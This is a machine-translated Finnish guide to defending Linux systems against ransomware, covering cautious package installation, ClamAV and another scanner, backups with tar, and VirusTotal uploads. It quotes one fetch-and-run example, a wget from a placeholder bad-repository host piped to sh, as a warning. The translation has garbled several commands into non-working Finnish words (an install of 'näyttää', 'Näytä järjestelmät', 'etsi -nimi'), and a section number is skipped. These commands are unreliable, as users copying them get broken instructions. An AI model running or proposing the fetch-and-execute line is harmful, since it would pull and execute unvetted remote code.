Ransomware on yksi uhkaavimmista ongelmista verkkoturvallisuuden maailmassa. On pelottavaa ajatella, että joku voisi pitää datasi panttivankina. Jotkut ransomware-infektiot salaavat kaiken tietyllä määrällä olevan datan, ja sen takana olevat henkilöt vaativat tietyn määrän rahaa, ennen kuin he suostuvat vapauttamaan avaimen, joka tarvitaan näiden tietojen avaamiseen. Tämä koskee erityisesti ihmisiä, joiden tietoihin on investoitu paljon rahaa. Pieniä hyviä uutisia on kuitenkin Linux-käyttäjille.
Useimmissa tilanteissa lunnasohjelmakoodin on vaikea saada hallintaansa muuta kuin vain käyttäjän kotihakemistoa. Näillä ohjelmilla ei ole oikeuksia koko asennuksen roskakoriin. Siksi Linux-kiristysohjelma on enemmän ongelma palvelimissa, joissa operaattoreilla on aina pääkäyttäjän oikeudet. Ransomware ei saisi olla suuri ongelma Linux-käyttäjille, ja on useita vaiheita estääkseen sen tapahtumasta sinulle.
Tapa 1: Puolustaminen BashCrypt-tyylisiä hyökkäyksiä vastaan
BasyCrypt on osoitus lunnasohjelman käsitteestä, joka osoitti, että palvelinrakenteet on mahdollista saastuttaa tämän tyyppisellä haittaohjelmalla. Tämä tarjoaa perustiedot sille, miltä Linux-ransomware-paketit voivat näyttää. Vaikka ne ovat tällä hetkellä harvinaisia, samankaltaiset terveen järjen ennaltaehkäisevät toimet muiden alustojen palvelinjärjestelmänvalvojille toimivat yhtä hyvin täällä. Ongelmana on, että yritystason ympäristöissä saattaa olla suuri määrä erilaisia isäntäjärjestelmää käyttäviä ihmisiä.
Jos sinulla on sähköpostipalvelin, voi olla erittäin vaikeaa estää ihmisiä tekemästä tyhmyyttä. Muista parhaasi mukaan muistuttaa kaikkia olemaan avaamatta liitteitä, joista he eivät ole varmoja, ja haittaohjelmat skannaavat aina kaiken kyseessä olevan. Yksi muu asia, joka voi todella auttaa estämään tällaisia hyökkäyksiä, tulee seuraamalla binäärien asentamista wgetillä. Luonnollisesti sähköpostipalvelimellasi ei todennäköisesti ole kokonaan työpöytäympäristöä ja luultavasti käytät wget-, apt-get-, yum- tai pacman-tiedostoja tulevien pakettien hallintaan. On erittäin tärkeää seurata, mitä arkistoja näissä asennuksissa käytetään. Joskus näet joko komennon, joka haluaa sinun suorittavan jotain wget-tyyppistä http: //www.thisisaprettybadcoderepo.webs/ -O- | sh, tai se voi olla shell-komentosarjan sisällä. Kummallakin tavalla älä suorita sitä, jos et tiedä mihin kyseinen arkisto on tarkoitettu.
Tapa 2: Skanneripaketin asentaminen
Useita avoimen lähdekoodin haittaohjelmien skannaustekniikoita on olemassa. ClamAV on ylivoimaisesti tunnetuin, ja voit asentaa sen moniin apt-pohjaisiin jakeluihin käyttämällä:
sudo apt-get install clamav
Kun se on asennettu, man clamavin tulisi selittää käyttö selkeällä kielellä. Muista, että vaikka se voi skannata ja poistaa tartunnan saaneita tiedostoja, se ei kuitenkaan voi poistaa tartuntakoodia tiedostosta. Tämä on kaikki tai ei mitään -tilanne.
On toinen skanneri, jota et ehkä tunne, mutta siitä on hyötyä, jos piilotetut prosessit pelottavat sinua. Jälleen kerran, jos käytät apt-pohjaista jakelua, asenna näytä skanneri antamalla tämä komento:
sudo apt-get install näyttää
Kun se on asennettu, kirjoita:
sudo Näytä järjestelmät
Tämä tarkistaa järjestelmän täydellisesti kaikista piilotetuista prosesseista.
Tapa 4: Pidä puhtaat varmuuskopiot käsillä
Vaikka tämän ei pitäisi edes olla ongelma, koska kaikkien tulisi aina tehdä varmuuskopioita, hyvien varmuuskopioiden saaminen voi välittömästi poistaa lunnasohjelman. Se, mitä Linux-alustalla on hyvin vähän lunnasohjelmaa, pyrkii hyökkäämään tiedostoihin, joiden laajennukset ovat ominaisia verkkokehitysalustoille. Tämä tarkoittaa, että jos sinulla on tonnia .php-, .xml- tai .js-koodeja, sinun kannattaa varmuuskopioida tämä. Harkitse seuraavaa koodiriviä:
tar -cf backups.tar $ (etsi -nimi “* .ruby” -tai -nimi “* .html”)
Tämän pitäisi luoda iso nauhatiedostotiedosto kaikista tiedostoista, joissa on .ruby- ja .html-laajennukset tiedostorakenteessa. Sen jälkeen se voidaan siirtää toiseen väliaikaiseen alihakemistoon purettavaksi sen varmistamiseksi, että sen luominen toimi oikein.
Tämä nauha-arkisto voidaan ja pitäisi siirtää ulkoiseen taltioon. Voit tietysti käyttää .bz2-, .gz- tai .xv-pakkausta ennen kuin teet niin. Haluat ehkä luoda peilattuja varmuuskopioita kopioimalla ne kahteen eri osaan.
Tapa 5: Verkkopohjaisten skannerien käyttö
Ehkä olet ladannut RPM- tai DEB-paketin sivustolta, joka lupaa sisältää hyödyllisiä ohjelmistoja. Ohjelmistoa jaetaan myös 7z- tai pakatun tervatiedoston kautta. Mobiilikäyttäjät saattavat myös saada Android-paketteja APK-muodossa. Nämä on helppo skannata työkalulla suoraan selaimessasi. Osoita se osoitteeseen https://www.virustotal.com/ ja kun sivu latautuu, osoita Valitse tiedosto -painiketta. Muista ennen lähettämistä, että tämä on julkinen palvelin. Vaikka se on turvallinen ja Alphabet Inc: n ylläpitämä, se siirtää tiedostoja julkisesti, mikä saattaa olla ongelma joissakin erittäin turvallisissa ympäristöissä. Se on myös rajoitettu 128 Mt: n tiedostoihin.
Valitse tiedosto avautuvasta ruudusta ja valitse avaa. Tiedostonimi ilmestyy painikkeen vieressä olevalle riville ruudun häviämisen jälkeen.
Napsauta suurta sinistä 'Skannaa se!' -painiketta. Näet toisen ruudun, joka ilmoittaa, että järjestelmä lähettää tiedostosi.
Jos joku on jo tarkistanut tiedoston etukäteen, se ilmoittaa sinulle edellisestä raportista. Se tunnistaa tämän SHA256-summan perusteella, joka toimii samalla tavalla kuin samat Linux-komentorivityökalut kuin olet tottunut. Jos ei, se suorittaa täydellisen tarkistuksen 53 erilaisella skannausohjelmalla. Jotkut niistä saattavat aikakatkaista, kun tiedosto suoritetaan, ja nämä tulokset voidaan ohittaa turvallisesti.
Jotkut ohjelmat saattavat tuottaa erilaisia tuloksia kuin toiset, joten väärät positiiviset tulokset on helppo erottaa tällä järjestelmällä. Parasta on, että se toimii eri alustojen välillä, mikä tekee siitä yhtä houkuttelevan riippumatta siitä, mikä jakelu sinulla on eri laitteilla. Se toimii yhtä hyvin myös mobiilijakelusta, kuten Android, minkä vuoksi se on jälleen hyvä tapa tarkistaa APK-paketit ennen niiden käyttöä.
4 minuuttia luettu
